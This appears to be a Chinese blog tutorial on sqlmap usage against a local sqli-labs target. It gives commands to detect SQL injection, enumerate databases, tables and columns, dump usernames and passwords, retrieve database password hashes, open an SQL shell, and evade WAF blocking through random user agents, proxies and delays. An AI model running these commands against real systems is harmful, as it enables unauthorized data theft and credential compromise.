sqlmap使用方法
有特征?
簡單使用
查詢是否存在注入:
sqlmap -u http://192.168.1.100/Less-1/?id=1注:注入點后面的參數(shù)大于等于2個時,url需要加雙引號
兩個提示,提示1:可能存在注入,數(shù)據(jù)庫可能是Mysql;提示2:可能存在XSS
直接回車
反饋回來的信息
查詢https網站
sqlmap -u https://192.168.1.100/Less-1/?id=1 --force-ssl查詢當前用戶下的所有數(shù)據(jù)庫
sqlmap -u http://192.168.1.100/Less-1/?id=1 --dbs查詢數(shù)據(jù)庫中的表名
sqlmap -u http://192.168.1.100/Less-1/?id=1 -D security --tables查詢表中的字段名
sqlmap -u http://192.168.1.100/Less-1/?id=1 -D security -T users --columns查詢字段內容
sqlmap -u http://192.168.1.100/Less-1/?id=1 -D security -T users -C password,username --dump網站的用戶名和密碼全都明文顯示出來了
查詢數(shù)據(jù)庫中的所有用戶
sqlmap -u http://192.168.1.100/Less-1/?id=1 --users查詢數(shù)據(jù)庫用戶密碼
sqlmap -u http://192.168.1.100/Less-1/?id=1 --passwords密碼的hash值出來了,解密后就可以獲得到密碼
簡單的密碼直接可以用sqlmap算出來,不過計算的會比較慢
sqlmap 參數(shù)
-r 從文件中載入HTTP請求
sqlmap可以從一個文本文件中獲取HTTP請求,這樣就可以跳過設置一些其他參數(shù)(比如cookie,POST數(shù)據(jù),等等)。
vim 1.txt GET /Less-1/?id=1 HTTP/1.1 Host: 192.168.0.104 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 sqlmap -r 1.txt-v 輸出信息詳細級別:0-6
Sqlmap的輸出信息按從簡到繁共分為7個級別(和葫蘆娃一樣多),依次為0、1、2、3、4、5和6。使用參數(shù)“-v <級別>”來指定某個等級,如使用參數(shù)“-v 6”來指定輸出級別為6。默認輸出級別為1。各個輸出級別的描述如下:
- 只顯示Python的tracebacks信息、錯誤信息[ERROR]和關鍵信息[CRITICAL];
- 同時顯示普通信息[INFO]和警告信息[WARNING];
- 同時顯示調試信息[DEBUG];
- 同時顯示注入使用的攻擊荷載;
- 同時顯示HTTP請求;
- 同時顯示HTTP響應頭;
- 同時顯示HTTP響應體。
?
-m 從文本中獲取多個目標掃描
vim 1.txt http://192.168.0.104/Less-1/?id=1 http://192.168.0.104/Less-1/?id=2 http://192.168.0.104/Less-1/?id=3 http://192.168.0.104/Less-1/?id=4 http://192.168.0.104/Less-1/?id=5 sqlmap -m 1.txt–level 設置探測等級
不加level參數(shù)時,默認的探測等級是1,會測試get和post數(shù)據(jù)
等級2會比等級1多測試cookie
等級3會比等級2多測試 UA和referer
等級越高測試的payload越多,耗時越久
具體每個等級都有哪些payload可在payloads.xml中查看
kali中payloads.xml的默認位置是 /usr/share/golismero/tools/sqlmap/xml/payloads.xml
–is-dba 查詢當前數(shù)據(jù)庫的賬戶是否為管理員賬戶
sqlmap -u http://192.168.1.100/Less-1/?id=1 --is-dba–sql-shell 運行自定義sql語句
sqlmap -u http://192.168.1.100/Less-1/?id=1 --sql-shell現(xiàn)在就可以輸入自定義的sql語句來執(zhí)行了
–random-agent 設置一個隨機的UA
sqlmap默認的UA是 sqlmap/1.2.7#stable (http://sqlmap.org)
要是我們想設置一個隨機的UA,可使用該參數(shù)
–referer 設置指定的refer
有的頁面會判斷訪問的來源,所以有時候我們需要指定的refer
sqlmap -u http://192.168.1.100/Less-1/?id=1 --referer http://www.baidu.com–proxy 使用代理連接
sqlmap -u http://192.168.1.100/Less-1/?id=1 --proxy http://192.168.0.104:1080–proxy-file 使用文件中的代理地址連接
vim 1.txt 192.168.0.101:1080 192.168.0.102:1080 192.168.0.103:1080 192.168.0.104:1080 192.168.0.105:1080 sqlmap -u http://192.168.1.100/Less-1/?id=1 --proxy-file 1.txt–force-ssl 強制使用SSL/HTTPS
–delay 設置延時
每個HTTP請求之間的延遲(秒),防止因為訪問過于頻繁被網站防火墻攔截
sqlmap -u http://192.168.1.100/Less-1/?id=1 --delay 5–safe-url,–safe-freq 設置安全鏈接
–safe-url:提供一個安全不錯誤的連接,每隔一段時間都會去訪問一下。
–safe-freq:提供一個安全不錯誤的連接,每次測試請求之后都會再訪問一邊安全連接。
–dbms 指定數(shù)據(jù)庫
在知道目標所使用的數(shù)據(jù)庫的情況下,可以使用 --dbms 來指定數(shù)據(jù)庫
sqlmap -u http://192.168.1.100/Less-1/?id=1 --dbms=mysql-p 設置測試特定測試
要是目標鏈接有多個參數(shù),可以用 -p 來指定只測試特定的參數(shù)
sqlmap -u http://192.168.1.100/Less-1/?id=1 -p id?
?
總結
以上是生活随笔為你收集整理的sqlmap使用方法的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python2 安装 pip
- 下一篇: QT打印窗口、退出、设置字体及颜色、设置